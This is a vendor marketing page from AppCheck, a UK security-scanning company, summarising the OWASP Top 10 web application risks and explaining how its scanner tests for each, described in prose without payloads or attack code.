OWASP (Open Web Application Security Project) is an organisation providing unbiased information and advice surrounding computer and internet applications.
Every few years the OWASP community come together to review the ten most critical web application security risks by analysing vulnerability data spanning hundreds of organisations and over 100,000 real world applications.
These vulnerabilities are assessed using a number of factors such as detectability, exploitability and potential impact to create the final list.
So let’s take a look at what’s included and why AppCheck incorporates these vulnerabilities into it’s standard scan templates, reporting, dashboards and more…
Injection attacks are the most common type of fault found in web applications, they are usually the result of unfiltered user input being directly included into command executions or database queries.
The AppCheck Vulnerability Analysis Engine performs a number of checks for a large variety of injection attacks to build up a rationale as to why it thinks an application is vulnerable, and where it is vulnerable then provides an example of the payload it used to confirm the vulnerability along with technical detail and remediation advice. Browser and application frameworks evolve constantly and new techniques and vectors are discovered all the time.
Injection vulnerabilities that AppCheck performs checks for include:
Sometimes authentication can be implemented incorrectly or an application can contain routes to sensitive data that haven’t been correctly protected by an authentication barrier. In other cases it can be the session token that is vulnerable either to enumeration or not expiring, this can allow an attacker to guess the session token of another user (e.g. an administrator) and take control of their session to steal data.
While crawling an application AppCheck analyses the session for the possibility of enumeration by activating many sessions and examining the tokens. It will also look out for weakly implemented authentication, for example long response 302 redirects, which usually happens when the application serves up the content of a restricted view in the response of the page but then sends a redirect in the header.
AppCheck also includes configurable password guessing modules to identify weak account credentials with systems such as:
This is usually the accidental exposure of files or folders that should not be publicly accessible, for instance a hidden folder called invoices provided for the convenience of remote workers or a hidden “.git” directory accidentally served up from the root directory of the web server which contains all the source code for the application.
AppCheck performs “Brute Force” discovery, meaning we try thousands of paths that we have discovered in the wild through manual pen testing that are likely to exist. Such paths would not be found by a regular crawl as there is no link within the application to discover them. But by trying them and seeing how the application responds AppCheck can make you aware of these.
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
AppCheck attempts to inject various XXE payloads to exploit mis-configured XML parsing, including for the harder case of a blind channel, where out-of-band feedback is required to detect a vulnerability.
Similar to “Broken Authentication and Session Management” this is where routes / views within the application are not properly protected. For example it’s not uncommon to see that admin controls are just hidden from the application menu and that the function is not actually restricted from an average user, the application is just relying on it not being visible.
AppCheck attempts all routes it discovers during a crawl, both as an authorised user and an unauthorised user, and reports back on this. Access control mechanisms are validated by attempting to access components that should be restricted or should require prior authentication but fail to protect the resource.
Insecure or superficial access control systems that simply hide components but do not properly secure them are also identified.
Unfortunately due to the custom nature of applications AppCheck is unable to rule on if this is expected behaviour or not as it lacks context, it does present this list in its report however for review.
This is often out of date or un-patched frameworks or the stack on which the framework sits, often it can be a case of changing the settings within the stack to harden the security of the setup. For instance many default web server SSL setups make ciphers available with known vulnerabilities.
AppCheck maintains a database of common configuration faults and out of date and un-patched frameworks and will flag these if detected.
If configured to do so, AppCheck will perform a comprehensive infrastructure assessment against all IP addresses and web applications defined within the scope.
Cross site scripting is a type of injection attack whereby an attacker is able to inject JavaScript content into an application that runs in a user’s browser. Often thought of as an attack against the users of an application rather than the application itself, some more complicated XSS attacks target the administration and backend systems of an application (2nd order attacks).
Like other injection attacks AppCheck uses reasoning to determine if an application is vulnerable and presents its case within the vulnerability details. In the best case scenario AppCheck will present the vulnerability as “confirmed”, meaning that it has been successfully able to execute the injected JavaScript in real browsers. AppCheck can also detect complicated 2nd order injection attacks using our “Sentinel” service. Sentinel listens out for a number of things to assist AppCheck in attacking an application, but one of the things it listens out for is our 2nd order injection payloads calling home. Sometimes these can take weeks to show up after a scan has completed due to various back office processes being triggered, so if a 2nd order injection is detected then AppCheck will send you a notification to make you aware of it.
AppCheck covers a range of XSS variants including:
Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
As part of the injection checks, AppCheck will attempt to exploit both generic and specific deserialization vulnerabilities across a wide variety of frameworks and libraries.
With the rise of the huge number of 3rd party components freely available on the internet for inclusion in applications, it’s not uncommon for a developer to find a component or library and include it in an application to solve a problem or provide a widget. However vulnerabilities are often discovered in these components and either newer versions are released or they have been abandoned.
AppCheck looks at the libraries and JavaScript components used within an application using real browsers for confirmation of the existence and where possible to get the version. This is then compared to a regularly updated database containing thousands of known vulnerabilities within content management systems and reported back. In some cases static analysis of the code of the component will be performed and any suspect areas will be highlighted in the vulnerability.
The following dedicated assessment components are also provided by AppCheck:
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
Through creating a realistic attack scenario, AppCheck helps to flex monitoring and logging solutions and so can highlight weaknesses and omissions in current processes, for which our security team are always on hand to offer advice on best practice.
Whilst all the vulnerabilities above are included in standard AppCheck scans there are hundreds of vulnerabilities out there. If you’d like to know how AppCheck deals with any specific vulnerabilities or would like a demonstration of the system then please get in contact with us at: info@localhost
In the meantime download our OWASP Top 10 PDF here.
No software to download or install.
Contact us or call us 0113 887 8380
AppCheck is a software security vendor based in the UK, offering a leading security scanning platform that automates the discovery of security flaws within organisations websites, applications, network and cloud infrastructure. AppCheck are authorized by te Common Vulnerabilities and Exposures (CVE) Program aas a CVE Numbering Authority (CNA)